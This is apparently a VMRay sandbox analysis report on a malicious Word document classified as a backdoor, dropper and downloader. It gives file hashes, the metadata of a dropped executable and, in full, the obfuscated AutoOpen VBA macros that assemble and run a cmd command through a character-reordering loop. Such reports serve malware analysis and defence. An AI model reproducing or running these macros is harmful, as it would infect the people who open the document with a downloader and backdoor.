81f1a5fa...beee | Files
Logo
Try VMRay Analyzer
VTI SCORE: 100/100
Dynamic Analysis Report
Classification: Backdoor, Dropper, Downloader

81f1a5faaa792952e49c477f54c75beec7fd03d3a1c250db2b863ec2b669beee (SHA256)

Dokumente-UOM36417800369487.doc

Word Document

Created at 2018-08-01 10:16:00

...

Notifications (1/1)

The maximum number of reputation URL requests (10 per analysis) was exceeded. As a result, the reputation status could not be queried for all contacted URLs. In order to get the reputation status for all contacted URLs, please increase the 'Max URL Requests' setting in the system configurations.

Filters:
Filename Category Type Severity Actions
C:\Users\BGC6u8Oy yXGxkR\Desktop\Dokumente-UOM36417800369487.doc Sample File Word Document
Suspicious
...
»
Mime Type application/msword
File Size 94.38 KB
MD5 4fe8618fda1c5141bb946d547fe40b55 Copy to Clipboard
SHA1 9d34a049d49d0e2f741ea16ac4c53cfda4397e1d Copy to Clipboard
SHA256 81f1a5faaa792952e49c477f54c75beec7fd03d3a1c250db2b863ec2b669beee Copy to Clipboard
SSDeep 1536:JXWk1Uo0VnotvtY4wAL5/uf4df4df4df4df4dfB+aPAvFVWLDSy:8gUo0V8vtY4Huf4df4df4df4df4dfetk Copy to Clipboard
Parser Error Remark Static analyzer was unable to completely parse the analyzed file
File Reputation Information
»
Severity
Suspicious
First Seen 2018-08-01 12:02 (UTC+2)
Last Seen 2018-08-01 12:08 (UTC+2)
Office Information
»
Creator Onoweg-PC
Revision 1
Create Time 2018-08-01 06:17:00+00:00
Modify Time 2018-08-01 06:17:00+00:00
Document Information
»
Codepage Latin-1
Application Microsoft Office Word
App Version 16.0
Template Normal.dotm
Page Count 1
Line Count 1
Paragraph Count 1
Character Count 1
Chars With Spaces 1
Heading Pairs Title
VBA Macros (2)
»
Macro #1: DusqruXGiRh
» 
Attribute VB_Name = "DusqruXGiRh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   AppActivate 342903035
   AppActivate UcpRY
   AppActivate bcjshB
   AppActivate CDbl(ZjPiS)
Shell@ CVar("cm") + HFwcCQPnK + cVKPRTao + VWuoAzvSiR + VmbbjTFLYim + BMRMpufzooz + iaDLjRrA + JNXwwYfYfcNkUP, 184868679 - 184868679
   AppActivate Oct(liuwDr * HpAlr)
   AppActivate CInt(51)
   AppActivate ljBns
End Sub
Macro #2: lqwuoNztFoH
» 
Attribute VB_Name = "lqwuoNztFoH"
Function VWuoAzvSiR()
On Error Resume Next
AppActivate iwjzuY
   AppActivate 31
qHrrYiiSY = "d " + "/V/C" + CStr(Chr(zzdUEvJl + thUGYjnoZ + 34 + rwiNXCH + jDYDozjGb)) + "set " + "pPr=MOAN" + "tGXcfYQDJ" + "ZlJ"
AppActivate CDate(8018)
   AppActivate 11
   AppActivate KpTSY
oHztLqIqO = "qsHzDVpR" + "-8Ix'" + "$iS{@+vC2o" + "=/(W" + "Fbj" + "dh);gekU" + "naru}" + "P7:E, "
AppActivate CSng(2)
   AppActivate Sqr(2007 / lKRMQ - oCEwMo / jfQiS)
   AppActivate ChrB(56968 - Ubkaw)
LEZTtph = "wy0." + "\m&&f" + "or " + "%D in " + "(22"
AppActivate mdvmR
   AppActivate Round(zMTjz)
iozQNjMDza = ";" + "38;65;51;" + "56;17;4" + "7;51;14" + ";14" + ";64;29" + ";55;21;2" + "1;"
AppActivate 3752
   AppActivate Round(97)
oTkFLv = "39" + ";54;51;6" + "5;24" + ";38;44" + ";4" + "5;" + "51;" + "7;4;6" + "4;3;51;4;"
VWuoAzvSiR = qHrrYiiSY + oHztLqIqO + LEZTtph + iozQNjMDza + oTkFLv
   AppActivate Log(pqcpjt)
   AppActivate nHzTiY
   AppActivate 9881
End Function
Function VmbbjTFLYim()
On Error Resume Next
AppActivate Fix(pLwzhO + 17493)
   AppActivate ChrB(99577 * rmswv)
KwvcYdLF = "68;4" + "2;51" + ";44;36;14" + ";30;51;54" + ";4;49;2" + "9;15;" + "62" + ";17;39" + ";28;4" + "7;4;4;22" + ";61;40;40" + ";35"
AppActivate diuwRw
   AppActivate 950
   AppActivate Hex(7)
vlzIkWVtUs = ";46;4" + ";38;" + "50;4;" + "68;54" + ";14;40"
AppActivate Atn(302424527)
   AppActivate Fix(tVfWu)
   AppActivate Sin(94)
uiBiPnYdJ = ";55;70;66;" + "10;33" + ";47;4;" + "4;22;6" + "1;40;40" + ";35" + ";3"
AppActivate CSng(94)
   AppActivate CSng(17129 * 3311 / ujXjsJ + jTlwC)
KiXPKjXjpX = "0" + ";7;30;" + "38;57;17" + ";51;54" + ";4;51;56;" + "22" + ";56;30"
AppActivate Int(32)
   AppActivate VwWmBY
   AppActivate Cos(470)
wQdwikw = ";1" + "7" + ";51;17" + ";" + "68;7;38;70" + ";40;16;6" + ";53;" + "57;6"
AppActivate LZhETv
   AppActivate ChrB(NjQNqa)
ucjqQUMlZ = ";16;3" + "3;47;" + "4" + ";4;22;61;" + "40;40;57" + ";54;7;14;" + "51;44;57;" + "46;17;22" + ";30;"
AppActivate ChrB(wmPdWn)
   AppActivate ChrB(YcwYa)
   AppActivate 273
nwdKLpmv = "7;51;68;7" + ";3" + "8;70;4" + "0;" + "25;67;46;" + "33;47;4;4" + ";22;" + "61;40;40" + ";" + "35;55;1" + "4;30;57;5" + "4"
AppActivate lOVor
   AppActivate AzCXG
PQXuffbKNz = ";55;17;" + "68;7;3" + "8;70;40;" + "5;2" + "5;3" + "6;38;38" + ";2" + "6;33;47;4;"
AppActivate Round(pPDKV)
   AppActivate bnRocO
dqGPcmvUvY = "4;2" + "2;61;4" + "0;40;4;" + "47;" + "51;17;"
AppActivate nzuJt
   AppActivate Sgn(8)
   AppActivate Sgn(4092835)
UZIoPMj = "3" + "0;" + "14;35;" + "51;56;55" + ";70;51" + ";56" + ";30" + ";7;55;54;" + "51;5" + "5;50;14;"
AppActivate CDate(5)
   AppActivate Round(nMJmG)
tZhGzfHZ = "51;68;7;" + "38;70;" + "40;4" + ";44;" + "28;" + "68" + ";31;" + "22;14;30;" + "4" + ";41;28" + ";33;"
AppActivate 56374874
   AppActivate 793
jUiXSkPVTs = "28;48;49" + ";29;42;6;" + "62;6" + "4;39;6" + "4;28;" + "60;" + "37;60;2" + "8;49;29;" + "23" + ";42" + ";30;3"
AppActivate Log(7)
   AppActivate Log(58177 + HOtNIC + 34599 + YqdaD)
   AppActivate Chr(69867 * CzoDba + CIUllS - ckzqj)
LCBYkn = "9;29" + ";51;54;" + "35;61;4;5" + "1;70;22;" + "34;28;69;" + "28;34;29;4" + "2;6;62" + ";34;2" + "8;68;51" + ";27" + ";51" + ";28;49;8;" + "38;56;51;5"
VmbbjTFLYim = KwvcYdLF + vlzIkWVtUs + uiBiPnYdJ + KiXPKjXjpX + wQdwikw + ucjqQUMlZ + nwdKLpmv + PQXuffbKNz + dqGPcmvUvY + UZIoPMj + tZhGzfHZ + jUiXSkPVTs + LCBYkn
   AppActivate 5173
   AppActivate Sgn(5)
End Function
Function BMRMpufzooz()
On Error Resume Next
AppActivate Int(owLAhj)
   AppActivate Sin(OVjMD + dzMzQp)
FaRwcUQzhz = "5;7;47;4" + "1;29;54;1" + "6;1" + "3;64;30;54" + ";64;29;1" + "5;62;17;4"
AppActivate Sin(qDPQU)
   AppActivate CSng(489234647)
vdipzcoUCWh = "8;32;4;5" + "6;66;3" + "2;29;55" + ";21" + ";21" + ";68"
AppActivate hMEOp
   AppActivate ChrW(4192)
jfsEHhX = ";2" + "0;3" + "8" + ";65;54;14;" + "38;55;" + "4" + "6;4" + "3;30;" + "14;"
AppActivate 1455
   AppActivate CDate(FaMuOK)
   AppActivate CInt(129)
nLYkPk = "51;" + "41;29;54" + ";16;13" + ";63;64" + ";29;" + "23;4" + "2;30" + ";48;49;" + "31;4;55;56" + ";" + "4;24;5" + "9;56;38;7;" + "51;1"
AppActivate NfKWj
   AppActivate CLng(BEJCfW)
   AppActivate Log(338)
kCLFJpjp = "7;17;64;2" + "9;23;42" + ";" + "30;49;44" + ";" + "56;" + "51;55;"
AppActivate ChrB(VvpYfA)
   AppActivate 102711605
   AppActivate Tan(59)
jYXCk = "52;49;58;" + "7;55;4;" + "7;47" + ";32;58" + ";58;6" + "4;64;64" + ";64;64;6" + "4;64;"
AppActivate Fix(43)
   AppActivate Oct(pFYChz * GcDCi)
BoXzBaBnDDF = "64;64;" + "6" + "4;6" + "4" + ";64;6" + "4;64;64;" + "64;64" + ";8"
AppActivate CLng(jwfsd / IJsbK)
   AppActivate HuEfMK
zUOUa = "0)do se" + "t Zv=" + "!Zv!!" + "pPr:~" + "%D,1!" + "&&if %D==8" + "0 call %" + "Zv"
AppActivate Sin(WibbQj - CqKcX)
   AppActivate 7579
rEvYXOoV = ":~-362%" + CStr(Chr(CXFwSGmtZNz + LFBzGht + 34 + JiqIQSbAhMHD + qhuQQNiFkd)) + "   "
BMRMpufzooz = FaRwcUQzhz + vdipzcoUCWh + jfsEHhX + nLYkPk + kCLFJpjp + jYXCk + BoXzBaBnDDF + zUOUa + rEvYXOoV
   AppActivate iOPVjT
   AppActivate 21
End Function
c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe Created File Binary
Suspicious
...
»
Mime Type application/x-dosexec
File Size 152.00 KB
MD5 09825e3594c3b843b89e84650c05582b Copy to Clipboard
SHA1 0a9e192aa88a331cfa239c7dfba3d768fd76527c Copy to Clipboard
SHA256 46a07c4a907ba444e952dde338443fda6cb0d52202d1f07c916114c38ca9629f Copy to Clipboard
SSDeep 1536:7keo251Lv766vt7QtQwpl8FnKXXKnwgT4m2V9AadfIpZYKpOovk4xKLZT5:AeljLDP1syI0KHji4m25dwESvtMdT5 Copy to Clipboard
ImpHash d1b7c726d175fe07a1073d8719fe56df Copy to Clipboard
Parser Error Remark Static analyzer was unable to completely parse the analyzed file
File Reputation Information
»
Severity
Suspicious
First Seen 2018-08-01 11:14 (UTC+2)
Last Seen 2018-08-01 11:14 (UTC+2)
PE Information
»
Image Base 0x400000
Entry Point 0x41b50e
Size Of Code 0x1c000
Size Of Initialized Data 0xa000
File Type executable
Subsystem windows_gui
Machine Type i386
Compile Timestamp 2017-02-23 03:20:06+00:00
Version Information (2)
»
LegalCopyright © Microsoft Corporation. All rights reserved.
FileDescription qqqqqqqqqqqqqqqqq
Sections (6)
»
Name Virtual Address Virtual Size Raw Data Size Raw Data Offset Flags Entropy
.text 0x401000 0x1b796 0x1c000 0x1000 type_dsect, cnt_code, mem_execute, mem_read 7.43
.crt1 0x41d000 0x54e8 0x5000 0x1d000 cnt_initialized_data, mem_read, mem_write 3.28
.idata 0x423000 0x32a 0x1000 0x22000 cnt_initialized_data, lnk_comdat, mem_read 1.31
.z9 0x424000 0x4 0x1000 0x23000 cnt_initialized_data, mem_read 0.01
.rsrc 0x425000 0x2a0 0x1000 0x24000 cnt_initialized_data, mem_read 0.78
.reloc 0x426000 0x6b4 0x1000 0x25000 cnt_initialized_data, mem_discardable, mem_read 3.39
Imports (8)
»
WINSPOOL.DRV (1)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
DeviceCapabilitiesW 0x0 0x42304c 0x23168 0x22168 0x49
msvcrt.dll (2)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
strncmp 0x0 0x42305c 0x23178 0x22178 0x51f
realloc 0x0 0x423060 0x2317c 0x2217c 0x4ff
OLEAUT32.dll (1)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
VarUI1FromStr 0x88 0x423030 0x2314c 0x2214c -
KERNEL32.dll (6)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
lstrlenA 0x0 0x423014 0x23130 0x22130 0x54d
GetModuleHandleA 0x0 0x423018 0x23134 0x22134 0x215
GetNamedPipeClientSessionId 0x0 0x42301c 0x23138 0x22138 0x21f
GetCurrentThreadId 0x0 0x423020 0x2313c 0x2213c 0x1c5
SwitchToThread 0x0 0x423024 0x23140 0x22140 0x4bc
ConvertFiberToThread 0x0 0x423028 0x23144 0x22144 0x6a
USER32.dll (4)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
DispatchMessageA 0x0 0x423038 0x23154 0x22154 0xae
SendMessageTimeoutA 0x0 0x42303c 0x23158 0x22158 0x27a
PostThreadMessageA 0x0 0x423040 0x2315c 0x2215c 0x238
GetDC 0x0 0x423044 0x23160 0x22160 0x121
WinSCard.dll (1)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
g_rgSCardT1Pci 0x0 0x423054 0x23170 0x22170 0x43
CRYPT32.dll (1)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
CertAddCertificateLinkToStore 0x0 0x423000 0x2311c 0x2211c 0x5
GDI32.dll (2)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
EqualRgn 0x0 0x423008 0x23124 0x22124 0x12d
GetTextCharset 0x0 0x42300c 0x23128 0x22128 0x216
C:\Users\BGC6U8~1\AppData\Local\Temp\F843.tmp Created File Stream
Unknown
...
»
Mime Type application/octet-stream
File Size 0.05 KB
MD5 61974b8f808747119a0234c563fda669 Copy to Clipboard
SHA1 16bdeca2a2f85bc92c608d84ba8f892b692b2172 Copy to Clipboard
SHA256 f188d8900c336dc2745411755c8b90588a2c3d24a99afee9f9e13b8ddd3f53ea Copy to Clipboard
SSDeep 3:PlQVlAVUKbnwRl+RJZ3E:dQPAbwDn Copy to Clipboard
C:\Users\BGC6U8~1\AppData\Local\Temp\F833.tmp Created File Text
Unknown
...
»
Mime Type text/plain
File Size 0.08 KB
MD5 172ee94da6ee51655ec4ff88bee8c5eb Copy to Clipboard
SHA1 6c8a98026cb9e733aa1b32f8516d268e831d13b9 Copy to Clipboard
SHA256 28886aa73bb5eccdf20c58ade6ba559a89733369743301b30cbb33b9321ca1f7 Copy to Clipboard
SSDeep 3:Rq3sFZJiKbNLQDW7q1KcKJRKVJmz:43sPJ38DjKNRo4 Copy to Clipboard
Exit-Icon
WHOIS Domain Information
Domain Name
WHOIS Response 

       		
      

     

    

   

  

  

  

  

   

    
    

     Function Logfile
    

    

     

      Download-Icon
     

    

    

     Exit-Icon
    

   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    Before
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    After
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image